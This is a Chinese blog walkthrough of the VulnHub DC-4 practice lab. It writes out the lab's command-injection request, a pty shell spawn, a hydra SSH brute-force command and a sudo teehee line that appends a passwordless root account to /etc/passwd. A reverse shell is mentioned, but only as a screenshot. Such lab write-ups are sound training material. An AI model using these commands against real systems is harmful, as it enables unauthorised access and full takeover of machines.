VulnHub仿真靶机渗透之DC-4 【DC系列】

DC系列靶机

仿真靶机渗透

发布日期: 2022-03-08

这次渗透是DC系列（VulnHub的仿真靶机）的DC-4，包含了nc反弹shell、hydra爆破ssh 、teehee权限提升等知识。

VulnHub靶机渗透之DC-4【DC系列】

任务：拿到root权限，找到flag

发现主机：192.168.124.133

1646723870796

扫描开放端口-> 80 22

开放80端口http和22端口ssh，看看网站

1646724000836

burp爆破登录框->admin和happy

1646724065780

看源代码没有登录限制，用burp爆破

1646724748260

1646725134684

admin happy

1646725317926

登录成功

选中List Files ->run，发现出现了linux ls -al的东西。

1646725434859

burp抓包发现可以执行命令执行，空格用+代替

1646725647725



POST /command.php HTTP/1.1
Host: 192.168.124.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.124.133
Connection: close
Referer: http://192.168.124.133/command.php
Cookie: PHPSESSID=hv60loubee72a5ui7qnfd3gbo6
Upgrade-Insecure-Requests: 1

radio=ls+-l&submit=Run

burp发送到repeater

nc反弹shell

修改成whoami，发现执行了命令，表明此处可以命令执行，然后我们可以反弹shell了。

1646725823964

修改成图下所示

1646727970388

用python获取一个完整的交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

1646730516513

发现三个用户

1646731459786

切换到/home目录下【用户名文件夹是在 /home下的,】，然后查看用户目录

发现三个用户【charles、jim和sam】，挨个查看里面有没有可以利用的信息，只有jim里面有可用信息，有备份密码信息还有mbox【没有权限，看不了】。

1646730268159

1646730230450

1646730315030

1646730301717

nc下载权限不够，直接复制粘贴

1646731221665

1646731572304

1646731586021

1646731693162

hydra九头蛇爆破ssh

使用hydra对三个普通用户ssh登录爆破，三个用户名写入dc4_user.txt文件，密码写入dc4_passwd.txt文件。

hydra -L dc4_user.txt -P dc4_passwd.txt 192.168.124.133 ssh -t 20 -o paswd.txt
#使用线程数20，用户名字典dc4_user.txt，密码字典 dc4_passwd.txt，ssh服务进行爆破，将用户名和正确的密码输出到paswd.txt文件中
#爆破ssh   hydra -L 【用户名字典】 -P 【密码字典】 需要爆破的ip 需要爆破的服务ssh  -t 线程数  -o 输出文件

使用hydra进行ssh爆破成功：发现jim登录密码： jibril04

1646732847996

jim账号ssh登录成功 1646734429291

1646737739539

sudo -l

查看jim权限，看有没有可以提权的，发现sudo

都用不了，看看有没有其他账户的信息。

看看之前没有权限的mbox

发现了个来自root用户的邮件，再看看其他的邮件信息。

1646734607140

去/var/mail看看【var目录主要针对常态性变动的文件,包括缓存(cache)、登录档(log file)以及某些软件运作所产生的文件】

charles的密码。

charles：^xHhA&hvim0y

1646734915395

得到密码之后，就可以切换charles用户了

然后sudo -l查看权限：

1646735096134

发现charles用户可以以root身份去运行teehee命令。

teehee --help

发现teehee可以文件写入，也不会覆盖文件

1646735959829

teehee提权

网上搜索一下teehee提权：搜索到了两种方法

法1.在/etc/passwd下添加新的root权限的目录

法2.添加定时执行的任务

1646735717684

1646735755609

1646735807853

1646735900688

我们使用第一种方法

添加一个root超级权限的admin账户,密码为空，然后使用teehee执行直接写入 passwd中

echo "admin::0:0:::/bin/bash"|sudo teehee -a /etc/passwd
#    echo 命令与 sudo 命令配合使用，可以实现向那些只有系统管理员才有权限操作的文件中写入信息
#    [用户名]：[密码]：[UID]：[GID]：[身份描述]：[主目录]：[登录shell]

1646738107310

查看添加成功没，成功了

1646736907358

1646737604490

cat /etc/passwd | grep admin
# 查看/etc/passwd的admin也可以
tail -n 5 /etc/passwd 
# 查看/etc/passwd最后5行

切换admin用户成功

1646736965490

搜索一下flag位置，在root下，成功拿到

1646737045169

1646737070452

总结：

Burpsuite爆破登录页面用户名和密码、burp修改进行命令执行、nc反弹shell、hydra爆破ssh 、teehee权限提升

要多注意各个用户目录下的文件信息，很可能就隐藏有下一步提权的关键信息

参考链接：

Vulnhub-DC-4靶场通关笔记【鹏组安全】

Vulnhub 靶机实战系列：DC -4 【雷神众测】

highgerms

http://highgerms.github.io/2022/03/08/dc-4/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 highgerms !

DC系列靶机

VulnHub仿真靶机渗透之DC-5 【DC系列】

这次渗透是DC系列（VulnHub的仿真靶机）的DC-5，包含了日志文件getshell、suid提权-screen 4.5.0等知识。

2022-03-14 仿真靶机渗透

DC系列靶机

VulnHub仿真靶机渗透之DC-3 【DC系列】

这次渗透是DC系列（VulnHub的仿真靶机）的DC-3，包含了提权、传webshell等知识。

2022-03-06 仿真靶机渗透

DC系列靶机